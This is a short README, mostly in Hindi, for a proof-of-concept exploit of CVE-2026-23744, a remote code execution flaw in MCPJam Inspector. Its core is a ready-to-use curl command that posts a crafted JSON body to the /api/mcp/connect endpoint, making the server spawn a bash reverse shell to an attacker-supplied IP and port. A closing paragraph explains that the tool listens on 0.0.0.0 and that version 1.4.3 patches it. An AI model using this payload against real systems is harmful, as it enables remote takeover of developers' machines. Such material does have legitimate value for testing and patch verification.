
CVE-2026-23744 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, MCPJam Inspector में एक रिमोट कोड एक्ज़ीक्यूशन कमजोरी। रिवर्स शेल पेलोड के साथ /api/mcp/connect एंडपॉइंट पर तैयार किए गए HTTP अनुरोध के माध्यम से RCE प्रदर्शित करता है।
MCP सर्वर में भेद्यता पर PoC।
सही बॉडी के साथ पोस्ट भाग के लिए स्वचालित।
/api/mcp/connect
curl http://evil.com:6274/api/mcp/connect --header "Content-Type: application/json" --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'
MCPJam Inspector MCP सर्वरों के लिए पहला स्थानीय विकास मंच है। संस्करण 1.4.2 और इससे पहले के संस्करण रिमोट कोड निष्पादन (RCE) भेद्यता के प्रति संवेदनशील हैं, जो हमलावर को एक डिज़ाइन की गई HTTP अनुरोध भेजने की अनुमति देता है जो एक MCP सर्वर की स्थापना को सक्रिय करता है, जिससे RCE उत्पन्न होता है। चूंकि MCPJam इंस्पेक्टर डिफ़ॉल्ट रूप से 127.0.0.1 के बजाय 0.0.0.0 पर सुनता है, एक हमलावर एक साधारण HTTP अनुरोध के माध्यम से दूरस्थ रूप से RCE को सक्रिय कर सकता है। संस्करण 1.4.3 में एक पैच है।